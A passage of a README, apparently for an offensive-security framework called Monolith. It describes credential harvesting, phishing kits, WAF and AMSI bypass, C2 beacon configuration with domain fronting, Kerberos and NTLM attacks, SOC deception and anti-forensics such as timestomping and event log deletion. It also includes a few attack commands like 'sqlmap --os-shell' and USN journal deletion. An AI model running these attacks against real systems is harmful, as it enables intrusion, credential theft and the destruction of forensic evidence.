│ │ Code-reuse │ │ Time-based │ │ Hide returns │ │ Full memory │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /evasion/sleep/ - Sleepmask page
POST /evasion/sleep/generate - Generate sleepmask
POST /evasion/sleep/test - Test configuration
## 🆕 New Modules & Features (2026)
### Credential Harvesting & Session Hijacking Kit
- **File:** tools/cred_harvest.py
- **Features:** XSS/SSRF credential steal, keylogger injection, session cookie theft, AI-based credential validation (weak password detection).
- **Impact:** Web credential steal success rate increased to 90%, session hijack enables admin access.
### Advanced WAF & API Gateway Bypass
- **File:** evasion/advanced_waf_bypass.py
- **Features:** HTTP/3 QUIC smuggling, GraphQL injection, WebSocket tunneling, AI rule inference, bypasses modern WAF/API gateways.
- **Impact:** Bypass success rate up to 98% on Cloudflare/Akamai/Imperva/AWS.
### Web Payload Obfuscator
- **File:** evasion/web_obfuscator.py
- **Features:** Language/technique randomization, AI-powered evasion, payload mutation for web attacks.
- **Impact:** Increased web payload stealth and bypass rates.
### SOC Deception & Honey Pot Poisoning
- **File:** evasion/soc_deception.py
- **Features:** Fake honeypot deploy (decoy servers), false flag events (fake ransomware, fake exfil), AI deception pattern generation to fatigue SOC analysts.
- **Impact:** Detection time extended to days/weeks, SOC effectiveness reduced.
### Automated Pentest Workflow Orchestrator
- **File:** tools/pentest_orchestrator.py
- **Features:** End-to-end pentest automation: target input → vuln scan → exploit chain → lateral movement → persistence → report generation, AI step-by-step decision making.
- **Impact:** Manual pentest duration reduced from hours to minutes, instant reporting.
## 🤖 AI/ML Powered Features
### 🛡️ Purple Team Validator
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🛡️ PURPLE TEAM VALIDATOR │
│ tools/purple_team_validator.py (~1500 lines) │
│ "Automated Red Team Validation & Report Generator" │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ VALIDATION WORKFLOW │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ CREATE │───▶│ RUN │───▶│ ANALYZE │───▶│ REPORT │ │
│ │ CAMPAIGN │ │ TESTS │ │ GAPS │ │ GENERATE │ │
│ │ │ │ │ │ │ │ │ │
│ │ • Name │ │ • 50+ tests │ │ • Detection │ │ • HTML │ │
│ │ • EDR list │ │ • Simulate │ │ • Evasion │ │ • PDF │ │
│ │ • Tactics │ │ • Parallel │ │ • Coverage │ │ • Markdown │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ MITRE ATT&CK COVERAGE │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ TA0001 Initial Access │ T1566 Phishing, T1190 Exploit │
│ TA0002 Execution │ T1059 PowerShell/CMD, T1047 WMI │
│ TA0003 Persistence │ T1547 Registry, T1053 Scheduled Task │
│ TA0004 Privilege Escalation│ T1548 UAC Bypass, T1134 Token Manipulation │
│ TA0005 Defense Evasion │ T1562 Disable Tools, T1070 Log Clear │
│ TA0006 Credential Access │ T1003 LSASS Dump, T1558 Kerberoast │
│ TA0007 Discovery │ T1087 Account Enum, T1082 System Info │
│ TA0008 Lateral Movement │ T1021 Remote Services, T1570 Tool Transfer │
│ TA0009 Collection │ T1005 Local Data, T1114 Email │
│ TA0010 Exfiltration │ T1041 C2 Channel, T1048 Alternative Protocol │
│ TA0011 Command & Control │ T1071 Web Protocols, T1105 Ingress Tool │
│ TA0040 Impact │ T1486 Ransomware, T1490 Inhibit Recovery │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ AI RECOMMENDATIONS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Based on detection gaps, AI generates: │
│ • Specific remediation steps per technique │
│ • Detection rule improvements │
│ • Monitoring recommendations │
│ • Priority-ranked action items │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ REPORT FORMATS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ Interactive │ │ JSON │ │ Markdown │ │ Executive │ │
│ │ HTML │ │ Export │ │ Technical │ │ Summary │ │
│ │ │ │ │ │ │ │ │ │
│ │ • Charts │ │ • Machine │ │ • GitHub ready │ │ • Management │ │
│ │ • Heatmaps │ │ readable │ │ • Documentation │ │ friendly │ │
│ │ • Timeline │ │ • API ready │ │ • Detailed │ │ • Key metrics │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /evasion/purple-team - Purple Team UI
GET /api/purple-team/status - Campaign status
GET /api/purple-team/tests - Available tests
POST /api/purple-team/campaign/create - Create campaign
POST /api/purple-team/campaign/run - Run validation
POST /api/purple-team/quick-assessment - Quick scan
POST /api/purple-team/report/generate - Generate reports
### 🧠 AI Vulnerability Scanner
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🧠 AI VULNERABILITY SCANNER │
│ cybermodules/ai_vuln.py (~800 lines) │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ │
│ ┌───────────────┐ ┌───────────────┐ │
│ │ TARGET URL │───────────────────▶│ AI ANALYSIS │ │
│ │ or CODE │ │ │ │
│ └───────────────┘ │ • Pattern │ │
│ │ Recognition │ │
│ │ • Context │ │
│ │ Analysis │ │
│ │ • Exploit │ │
│ │ Generation │ │
│ └───────┬───────┘ │
│ │ │
│ ┌─────────────────────────┼─────────────────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ SQL Inject │ │ XSS │ │ SSRF │ │
│ │ Detection │ │ Detection │ │ Detection │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ ┌─────────────────┐ ┌─────────────────┘ ┌─────────────────┘ │
│ │ RCE │ │ LFI/RFI │ │ Auth Bypass │ │
│ │ Detection │ │ Detection │ │ Detection │ │
│ └─────────────────┘ └─────────────────┘ └─────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
### 🎯 AI-Guided Lateral Movement
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎯 AI-GUIDED LATERAL MOVEMENT │
│ cybermodules/ai_lateral_guide.py │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ │
│ AI analyzes network topology and recommends optimal attack paths: │
│ │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ │
│ │ Workstation│─────────▶│ File │─────────▶│ Domain │ │
│ │ PC01 │ 89% │ Server │ 67% │ DC01 │ │
│ │ │ Success │ FS01 │ Success │ Controller│ │
│ └───────────┘ └───────────┘ └───────────┘ │
│ │ ▲ │
│ │ ┌───────────┐ │ │
│ └──────────────────▶│ SQL │──────────────┘ │
│ 45% │ Server │ 78% │
│ Success │ SQL01 │ Success │
│ └───────────┘ │
│ │
│ Recommendations: │
│ 1. Use WMIExec to FS01 (highest success rate) │
│ 2. Extract credentials from FS01 │
│ 3. Pivot to DC01 using extracted creds │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
## 🌐 Web Interface
### 📊 Dashboard
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📊 MAIN DASHBOARD │
│ templates/dashboard.html │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ╔═══════════════════════════════════════════════════════════════════════════════════╗ │
│ ║ 🔴 MONOLITH COMMAND CENTER ║ │
│ ╚═══════════════════════════════════════════════════════════════════════════════════╝ │
│ │
│ ┌─────────────────────────────── QUICK ACCESS ───────────────────────────────────────┐ │
│ │ │ │
│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │
│ │ │ 🎫 │ │ 🔄 │ │ 🔀 │ │ ☁️ │ │ 🛡️ │ │ 🧬 │ │ │
│ │ │ Kerberos │ │ NTLM │ │ Lateral │ │ Cloud │ │ Evasion │ │ AI │ │ │
│ │ │ Chain │ │ Relay │ │ Movement │ │ Pivot │ │ Test │ │ Adversar │ │ │
│ │ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │ │
│ │ ┌──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │ │
│ │ │ 🥷 │ │ 🕸️ │ │ 🎣 │ │ ☣️ │ │ 🛡️ PRO │ │ 🔮 │ │ │
│ │ │ Relay │ │ Web │ │ Phishing │ │ EDR │ │ Purple │ │ VR/AR │ │ │
│ │ │ Ninja │ │ Shell │ │ Kit │ │ Poison │ │ Team │ │ Viz │ │ │
│ │ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │ │
│ │ │ │
│ └─────────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌─────────────────────────── INITIATE ATTACK ────────────────────────────────────────┐ │
│ │ │ │
│ │ Target: [________________] Domain: [________________] │ │
│ │ │ │
│ │ ☑ Kerberos ☑ NTLM Relay ☑ Lateral ☑ Evasion ☑ Purple Team │ │
│ │ │ │
│ │ [🚀 LAUNCH ATTACK CHAIN] │ │
│ │ │ │
│ └─────────────────────────────────────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
### 🎣 Phishing Kit Generator
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎣 ADVANCED PHISHING KIT │
│ templates/phishing_advanced.html │
└─────────────────────────────────────────────────────────────────────────────────────────┘
Features:
• Pre-built templates (Microsoft 365, Google, LinkedIn, etc.)
• Custom HTML/CSS editor
• Credential harvesting
### 🔍 Automated Vulnerability Scanner
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔍 AUTOMATED VULNERABILITY SCANNER │
│ tools/vuln_scanner_integrator.py (~1270 lines) │
│ Multi-Scanner Integration with AI Priority Ranking │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ INTEGRATED SCANNERS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ │
│ │ NUCLEI │ │ OWASP ZAP │ │ NIKTO │ │ SQLMAP │ │
│ │ │ │ │ │ │ │ │ │
│ │ Template-based │ │ Web App Proxy │ │ Web Server │ │ SQL Injection │ │
│ │ 5000+ CVE/POC │ │ Active/Passive │ │ 6700+ checks │ │ Auto Exploit │ │
│ │ YAML templates │ │ Spider & Fuzz │ │ Plugin-based │ │ DB Fingerprint │ │
│ │ CI/CD ready │ │ API support │ │ SSL checks │ │ 6 DB engines │ │
│ └────────────────┘ └────────────────┘ └────────────────┘ └────────────────┘ │
│ ┌────────────────┐ ┌────────────────┐ │
│ │ NMAP NSE │ │ WPSCAN │ │
│ │ │ │ │ │
│ │ Network Vuln │ │ WordPress Scan │ │
│ │ 600+ scripts │ │ 25000+ vulns │ │
│ │ Service detect │ │ Plugin/Theme │ │
│ │ OS fingerprint │ │ User enum │ │
│ └────────────────┘ └────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ SCAN WORKFLOW │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ 1. TARGET │────▶│ 2. PARALLEL │────▶│ 3. AI RANK │────▶│ 4. EXPLOIT │ │
│ │ │ │ SCANNING │ │ │ │ CHAIN │ │
│ │ • URL/IP │ │ │ │ • Priority │ │ │ │
│ │ • Domain │ │ • Nuclei │ │ • Impact │ │ • SQLi→RCE │ │
│ │ • CIDR │ │ • ZAP │ │ • Difficulty │ │ • LFI→Shell │ │
│ │ │ │ • Nikto │ │ • CVSS Score │ │ • SSRF→Cloud │ │
│ │ │ │ • SQLMap │ │ │ │ │ │
│ │ │ │ • Nmap NSE │ │ │ │ │ │
│ └──────────────┘ └──────────────┘ └──────────────┘ └──────────────┘ │
│ │
│ ▼ │
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │5. CORRELATE │────▶│6. DEDUPLICATE│────▶│ 7. LATERAL │────▶│ 8. REPORT │ │
│ │ │ │ │ │ CHAIN │ │ │ │
│ │ • Find │ │ • Remove │ │ │ │ • JSON │ │
│ │ Chains │ │ Duplicates │ │ • Feed to │ │ • HTML │ │
│ │ • Group by │ │ • Merge │ │ ai_lateral │ │ • PDF │ │
│ │ Target │ │ Evidence │ │ _guide.py │ │ • Heatmap │ │
│ │ │ │ │ │ │ │ │ │
│ └──────────────┘ └──────────────┘ └──────────────┘ └──────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ VULNERABILITY TYPES DETECTED │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ 🔴 CRITICAL 🟠 HIGH 🟡 MEDIUM │
│ ───────── ────── ──────── │
│ • SQL Injection • XSS (Reflected/Stored) • CSRF │
│ • Remote Code Execution • Authentication Bypass • Clickjacking │
│ • Command Injection • IDOR • Info Disclosure │
│ • Deserialization • SSRF • Weak Credentials │
│ • XXE • Path Traversal • Open Redirect │
│ • LFI/RFI │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ AI PRIORITY RANKING │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Input: Vulnerability Details │
│ ┌────────────────────────────────────────────────────────────────────────────────┐ │
│ │ Title: SQL Injection in /api/users?id=1 │ │
│ │ Severity: CRITICAL (CVSS 9.8) │ │
│ │ Scanner: SQLMap │ │
│ │ Evidence: Boolean-based blind, Time-based blind │ │
│ └────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ AI Analysis: │
│ ┌────────────────────────────────────────────────────────────────────────────────┐ │
│ │ ✓ Priority Score: 98/100 │ │
│ │ ✓ Real-world Exploitability: HIGH │ │
│ │ ✓ Impact: Database compromise, potential RCE via xp_cmdshell │ │
│ │ ✓ Exploit Chain: SQLi → File Upload → Web Shell → Lateral Movement │ │
│ │ ✓ Lateral Potential: TRUE (High-value target) │ │
│ │ │ │
│ │ Exploit Suggestions: │ │
│ │ 1. Use sqlmap --os-shell for RCE │ │
│ │ 2. Extract admin hashes with hashdump │ │
│ │ 3. Pivot to internal network via SSRF │ │
│ └────────────────────────────────────────────────────────────────────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ LATERAL CHAIN INTEGRATION │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ High-Impact Vulnerabilities → ai_lateral_guide.py │
│ │
│ ┌────────────────────────────────────────────────────────────────────────────────┐ │
│ │ [Vuln Scanner] SQLi found in /api/users │ │
│ │ ↓ │ │
│ │ [AI Analysis] CVSS 9.8, Exploitable, Chain Potential │ │
│ │ ↓ │ │
│ │ [Lateral Guide] Add to entry_points[] │ │
│ │ ↓ │ │
│ │ [Auto Exploit] sqlmap --os-shell → Shell Obtained │ │
│ │ ↓ │ │
│ │ [Lateral Move] Enumerate domain → Kerberoast → Golden Ticket │ │
│ └────────────────────────────────────────────────────────────────────────────────┘ │
│ │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ VULNERABILITY HEATMAP │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ Severity Distribution: │
│ ┌────────────────────────────────────────────────────────────────────────────────┐ │
│ │ Critical ███████████░░░░░░░░░░░░░░░░ 12 (24%) │ │
│ │ High █████████████████████░░░░░ 28 (56%) │ │
│ │ Medium ████░░░░░░░░░░░░░░░░░░░░░░ 8 (16%) │ │
│ │ Low ██░░░░░░░░░░░░░░░░░░░░░░░░ 2 (4%) │ │
│ └────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ Type Distribution: │
│ • SQL Injection: 8 • XSS: 12 • SSRF: 3 │
│ • Command Injection: 4 • Path Traversal: 6 • Info Disclosure: 10 │
│ • Authentication: 5 • Misconfiguration: 2 │
│ │
│ OWASP Top 10 Coverage: │
│ • A01 (Broken Access): 15 findings │
│ • A03 (Injection): 18 findings │
│ • A05 (Misconfiguration): 8 findings │
│ • A07 (Auth Failures): 9 findings │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /tools/api/vuln-scanner/scan - Start vulnerability scan
GET /tools/api/vuln-scanner/status/ - Get scan status
GET /tools/api/vuln-scanner/results/ - Get vulnerabilities
GET /tools/api/vuln-scanner/heatmap/ - Get vulnerability heatmap
GET /tools/api/vuln-scanner/report/ - Export report (JSON/HTML)
GET /tools/api/vuln-scanner/scanners - List available scanners
Web UI: /tools/vuln-scanner
Usage Example (Python):
from tools.vuln_scanner_integrator import get_vuln_scanner, ScannerType
scanner = get_vuln_scanner()
# Start scan with specific scanners
job_id = scanner.scan_target(
target="https://example.com",
scanners=[ScannerType.NUCLEI, ScannerType.SQLMAP],
scan_type="full" # quick, full, deep
)
# Check status
status = scanner.get_scan_status(job_id)
print(f"Status: {status['status']}")
print(f"Vulns: {status['total_vulns']}")
# Get results with AI priority
vulns = scanner.get_vulnerabilities(job_id)
for v in vulns:
if v.ai_priority_score > 0.8:
print(f"HIGH PRIORITY: {v.title}")
print(f" CVSS: {v.cvss_score}")
print(f" Exploit: {v.ai_exploit_suggestions}")
# Generate heatmap
heatmap = scanner.generate_heatmap(job_id)
# Export report
html_report = scanner.export_report(job_id, format="html")
Usage Example (CLI):
# Quick scan with all available scanners
python tools/vuln_scanner_integrator.py https://example.com
# Specific scanners with output
python tools/vuln_scanner_integrator.py \
https://example.com \
--scanners nuclei sqlmap nmap \
--scan-type deep \
--output report.html
Features:
✓ 6 integrated scanners (Nuclei, ZAP, Nikto, SQLMap, Nmap NSE, WPScan)
✓ AI-powered priority ranking (0-100 score)
✓ Automatic exploit chain detection
✓ Lateral movement integration
✓ Result deduplication & correlation
✓ CVSS scoring & OWASP Top 10 mapping
✓ CWE classification
✓ Vulnerability heatmap generation
✓ Multi-format reports (JSON/HTML/PDF ready)
✓ SQLite database persistence
✓ Parallel/sequential scan modes
✓ Real-time progress tracking
✓ 80% reduction in manual recon time
✓ Professional pentest firm quality
### 🎣 Phishing Kit Generator (continued)
• Token capture (OAuth, SAML)
• Evasion techniques (domain fronting, URL shortening)
• Campaign management & tracking
• Real-time notifications
### 🔮 VR/AR Visualization
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔮 VR/AR ATTACK VISUALIZATION │
│ templates/vr_viz.html │
└─────────────────────────────────────────────────────────────────────────────────────────┘
Features:
• 3D network topology
• Real-time attack path visualization
• Unity WebGL integration
• Interactive node exploration
• Attack timeline replay
• Collaborative viewing
---
## 📡 API Reference
### Authentication
POST /api/auth/login
POST /api/auth/logout
GET /api/auth/status
### Attack Modules
# Kerberos
POST /api/kerberos/asrep-roast
POST /api/kerberos/kerberoast
POST /api/kerberos/golden-ticket
POST /api/kerberos/silver-ticket
# NTLM Relay
POST /api/relay/start
POST /api/relay/attack
GET /api/relay/captured
# Lateral Movement
POST /api/lateral/execute
POST /api/lateral/wmi
POST /api/lateral/psexec
# Cloud
POST /api/cloud/azure/prt
POST /api/cloud/aws/imds
POST /api/cloud/gcp/metadata
### Evasion
# AI Adversarial
POST /evasion/adversarial/mutate
POST /evasion/adversarial/benchmark
# EDR Poison
POST /api/edr-poison/generate
POST /api/edr-poison/campaign/create
# Purple Team
POST /api/purple-team/campaign/create
POST /api/purple-team/campaign/run
POST /api/purple-team/report/generate
# AMSI/ETW
POST /evasion/amsi/generate
POST /evasion/amsi/test
# Sleepmask
POST /evasion/sleep/generate
### Phishing
POST /api/phishing/create
POST /api/phishing/send
GET /api/phishing/captured
GET /api/phishing/stats
---
## ⚙️ Configuration
### Evasion Profiles
```yaml
# configs/evasion_profile_paranoid.yaml
profile: paranoid
amsi_bypass:
enabled: true
method: memory_patch
etw_bypass:
enabled: true
method: ntdll_patch
sleepmask:
enabled: true
algorithm: aes256_gcm
interval: 30000
traffic_masking:
enabled: true
domain_fronting: true
malleable_c2: true
anti_forensics:
timestomp: true
log_clear: true
artifact_cleanup: true
### C2 Beacon Configuration
# configs/beacon_config.yaml
beacon:
sleep: 60
jitter: 30
communication:
protocol: https
domain_fronting: true
fallback_domains:
- cdn.microsoft.com
- ajax.googleapis.com
evasion:
profile: paranoid
sleepmask: true
## 📦 Installation
### Requirements
- Python 3.9+
- PostgreSQL (optional, SQLite default)
- Redis (for background jobs)
- Docker (optional)
### Quick Install
# Clone repository
git clone https://github.com/ITherso/monolith.git
cd monolith
# Create virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install dependencies
pip install -r requirements.txt
pip install -r requirements_extra.txt
# Initialize database
flask db upgrade
# Start server
make run-prod
### Docker Install
# Build and run
docker-compose up -d
# Access
http://localhost:8080
## � NEW: Advanced Scanning & Reconnaissance Modules
### 1. 🔍 Service Fingerprinting Pro
Professional-grade service fingerprinting with Nmap NSE integration, CVE matching, and automated exploit recommendation.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔍 SERVICE FINGERPRINTING PRO WORKFLOW │
└─────────────────────────────────────────────────────────────────────────────────────────┘
[Target Input]
│
▼
┌─────────────────────────┐
│ Nmap Service Scan │
│ (NSE Scripts + -sV) │
└─────────────────────────┘
│
┌───────────────────┼───────────────────┐
▼ ▼ ▼
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ Version Detection│ │ Banner Grabbing │ │ SSL/TLS Analysis │
│ (5000+ sigs) │ │ (HTTP/SSH/FTP) │ │ (Certificate) │
└──────────────────┘ └──────────────────┘ └──────────────────┘
│ │ │
└───────────────────┼───────────────────┘
▼
┌─────────────────────────┐
│ Tech Stack Detection │
│ (Apache, PHP, Django) │
└─────────────────────────┘
│
┌───────────────────┼───────────────────┐
▼ ▼ ▼
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ CVE Matching │ │ Exploit Database │ │ Priority Scoring │
│ (NVD/CVSS) │ │ (Metasploit/EDB) │ │ (AI-powered) │
└──────────────────┘ └──────────────────┘ └──────────────────┘
│
▼
┌─────────────────────────┐
│ Results Dashboard │
│ Services • CVEs • PoCs │
└─────────────────────────┘
FEATURES:
✅ Nmap NSE integration (1000+ scripts) ✅ Service version detection
✅ Technology stack identification ✅ CVE database matching
✅ Automated exploit recommendations ✅ SSL/TLS certificate analysis
✅ HTTP header analysis ✅ Real-time progress tracking
**Usage:**
from tools.service_fingerprinter_pro import get_service_fingerprinter
fp = get_service_fingerprinter()
job_id = fp.start_fingerprint("192.168.1.1", scan_type="full")
# Or via CLI
python tools/service_fingerprinter_pro.py 192.168.1.1
**API Endpoints:**
- `POST /tools/api/service-fingerprinter/scan` - Start scan
- `GET /tools/api/service-fingerprinter/status/` - Check progress
- `GET /tools/api/service-fingerprinter/results/` - Get results
- `GET /tools/api/service-fingerprinter/fingerprints/` - Service list
- `GET /tools/api/service-fingerprinter/cves/` - CVE matches
- `GET /tools/api/service-fingerprinter/exploits/` - Exploits
### 2. 🕷️ Web Application Scanner Pro
OWASP Top 10:2021 complete coverage with automated vulnerability detection and exploit generation.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🕷️ WEB APPLICATION SCANNER ARCHITECTURE │
└─────────────────────────────────────────────────────────────────────────────────────────┘
[Target URL Input]
│
▼
┌───────────────────────────┐
│ Web Crawler Engine │
│ (Configurable Depth) │
└───────────────────────────┘
│
┌───────────────────────────────┼───────────────────────────────┐
│ │ │
▼ ▼ ▼
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ SQL Injection │ │ XSS Testing │ │ CSRF Testing │
│ • Boolean-based │ │ • Reflected │ │ • Token Validate │
│ • Error-based │ │ • Stored │ │ • Anti-CSRF │
│ • Union-based │ │ • DOM-based │ └──────────────────┘
│ • Time-based │ └──────────────────┘
└──────────────────┘ │
│ │
│ ┌───────────────┼───────────────┐
│ │ │ │
▼ ▼ ▼ ▼
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ IDOR Testing │ │ SSTI Testing │ │ XXE Testing │ │ CORS Testing │
│ • ID Tampering │ │ • Jinja2 │ │ • File Disclosure│ │ • Origin Check │
│ • Enumeration │ │ • Twig │ │ • SSRF │ │ • Credentials │
└──────────────────┘ │ • Freemarker │ └──────────────────┘ └──────────────────┘
│ • ERB/Velocity │
└──────────────────┘
│
▼
┌───────────────────────┐
│ Vulnerability Report │
│ OWASP • CVSS • CWE │
└───────────────────────┘
OWASP TOP 10:2021 COVERAGE:
✅ A01:2021 - Broken Access Control (IDOR, CSRF)
✅ A03:2021 - Injection (SQLi, XSS, SSTI, Command, XXE)
✅ A05:2021 - Security Misconfiguration (CORS, XXE, Directory Listing)
✅ A06:2021 - Vulnerable Components (Version Detection)
✅ A07:2021 - Authentication Failures (Session Fixation, Weak Passwords)
PAYLOAD CATEGORIES:
✅ SQL Injection: Boolean, Error, Union, Time-based (30+ payloads)
✅ XSS: Basic, Evasion, DOM-based (25+ payloads)
✅ SSTI: Jinja2, Twig, Freemarker, ERB, Velocity (20+ payloads)
✅ XXE: File disclosure, Cloud metadata, External DTD
✅ Command Injection: 10+ bypass techniques
**Usage:**
**Via Web Interface:**
- Access: http://localhost:8080/tools/web-app-scanner
- Input target URL, select scan mode and depth
- View results in real-time with dashboard
**Via Python:**
from tools.web_app_scanner import get_web_app_scanner
scanner = get_web_app_scanner()
job_id = scanner.start_scan(
target_url="https://example.com",
scan_mode="black_box", # or gray_box, white_box
scan_depth=2,
max_requests=1000
)
**Via CLI (Command Line):**
# Basic black box scan
python3 cyber.py --web-app-scan https://example.com
# Detailed gray box scan
python3 cyber.py --web-app-scan https://example.com --scan-mode gray_box --scan-depth 4
# White box scan with custom request limit
python3 cyber.py --web-app-scan https://example.com --scan-mode white_box --max-requests 5000
# Output as HTML report
python3 cyber.py --web-app-scan https://example.com --output-format html
# Output as JSON report
python3 cyber.py --web-app-scan https://example.com --output-format json --scan-depth 3
# Output as CSV
python3 cyber.py --web-app-scan https://example.com --output-format csv
**CLI Options:**
--web-app-scan URL Target URL to scan (required)
--scan-mode MODE Scan mode: black_box (default), gray_box, white_box
--scan-depth DEPTH Scan depth: 1-5 (default: 2)
--max-requests COUNT Maximum HTTP requests (default: 1000)
--output-format FORMAT Output format: json (default), html, csv
**Example Output:**
======================================================================
🕷️ WEB APPLICATION SCANNER - CLI MODE
======================================================================
Target: https://target.com
Scan Mode: black_box
Scan Depth: 2
Max Requests: 1000
======================================================================
[*] Initializing scanner...
[*] Job ID: cli_1708108800
[*] Starting scan of https://target.com...
[*] This will take some time depending on target size...
[████████████████████████████████████████] 100% - Pages: 50, Vulns: 26
[✓] Scan completed!
[*] Pages scanned: 50
[*] Vulnerabilities found: 26
[+] Report saved: /tmp/cli_1708108800_report.json
[*] Access web interface for detailed analysis:
[*] http://localhost:8080/tools/web-app-scanner
**API Endpoints:**
- `POST /tools/api/web-app-scanner/scan` - Start scan
- `GET /tools/api/web-app-scanner/status/` - Check progress
- `GET /tools/api/web-app-scanner/results/` - Get vulnerabilities
**Scan Modes:**
- **Black Box**: No source code access (parameter fuzzing)
- **Gray Box**: Partial access (authenticated testing)
- **White Box**: Full source code analysis
## 💀 God Mode Anti-Forensics (February 2026)
İzleri silmek değil, YOK ETMEK! Profesyonel red team operasyonları için forensic artifact temizleme sistemi.
### 🕐 Time Stomper
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🕐 TIME STOMPER │
│ $STANDARD_INFORMATION + $FILE_NAME Modification │
│ FULL TIMESTAMP WIPE │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ TIMESTAMP TARGETS TECHNIQUES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 📁 $STANDARD_INFORMATION │ │ 🔧 SetFileTime API │ │
│ │ • Creation Time │ │ Basic timestamp edit │ │
│ │ • Modified Time │ │ │ │
│ │ • Accessed Time │ │ 🔬 NtSetInformationFile │ │
│ │ • MFT Entry Time │ │ Kernel-level access │ │
│ │ │ │ │ │
│ │ 📝 $FILE_NAME │ │ 🧬 Direct MFT Parse │ │
│ │ • FN Creation │ │ Raw disk manipulation │ │
│ │ • FN Modified │ │ │ │
│ │ • FN Accessed │ │ 🗑️ USN Journal Clear │ │
│ │ • FN MFT Modified │ │ fsutil usn deletejournal │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ WHY $FILE_NAME MATTERS: │
│ ├── Most forensic tools check $FILE_NAME timestamps │
│ ├── $STANDARD_INFORMATION alone is NOT enough │
│ ├── MFT analysis reveals $FN discrepancies │
│ └── Full evasion requires BOTH attribute modification │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
### 👻 Phantom Event Log Cleaner
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 PHANTOM EVENT LOG CLEANER │
│ Selective Event Deletion Without Clearing Entire Logs │
│ Forensic Timeline Reconstruction Killer │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ CLEANUP PROFILES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
